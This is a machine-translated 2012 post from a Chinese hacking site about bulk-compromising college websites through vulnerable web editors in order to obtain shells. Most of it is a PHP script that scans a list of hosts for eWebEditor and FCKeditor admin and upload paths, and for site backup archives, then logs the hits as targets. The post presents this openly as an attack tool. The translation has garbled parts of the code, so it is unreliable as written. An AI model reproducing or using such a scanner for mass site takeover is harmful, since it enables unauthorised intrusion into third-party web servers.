The bulk of the invasion College Station vulnerability EXP-vulnerability warning-the black bar safety net

ID MYHACK58:62201235023
Type myhack58
Reporter 佚名
Modified 2012-09-25T00:00:00


By:deleter QQ:1 3 4 3 3 8 2 3 9 2 College Station substantially with the revision of the cms, and the cms in there must be the editor. Currently the editor of the vulnerability is less, is relatively safe, but College Station is not the same. A College website is bound to be a year old, unless the newly established University to the newly established Academy, so that the cms has a vulnerability editor, the probability is very large. Therefore, we can through the volume scan editor to get the shell.

Our aim is to bulk to take the station, according to this idea, we can use the following script for batch scanning.

EXP attach to:

<? php //Coded by deleter $f = fopen("scan_in.txt", 'r'); $fw = fopen("scan_out.txt", 'a'); $arr = array("/admin/editor/admin_login. asp", "/manege/ewebeditor/admin_login. asp", "/data/ewebeditor/admin_login. asp", "/ewindoweditor/admin_login. asp", the "/webeditor/admin_login. asp", "/Edit/eWebEditor. asp", "/system/eWebEditor/", "/admin/fckeditor/editor/filemanager/connectors/", "/fckeditor/editor/filemanager/connectors/", "/admin/FCKeditor/editor/filemanager/connectors/", "/manage/FCKeditor/editor/filemanager/connectors/", "/web_admin/editor/", "/ewebeditor/", "/wwwroot.rar", "/admin/webeditor/admin_login. asp"); $url = trim(fgets($f)); while(! feof($f)&&(! empty($url))){ foreach($arr as $key => $value){ $request = 'http://'.$ url.$ value; //Request the file $html = file_get_contents($request); //Returns the HTTP status code echo $request."n"; list($version,$status_code,$msg) = explode(' ',$http_response_header[0], 3); if($status_code=='2 0 0' || $status_code=='4 0 3'){ fwrite($fw, $request."n"); } } $url = trim(fgets($f)); } fclose($f); fclose($fw); ?>

[1] [2] next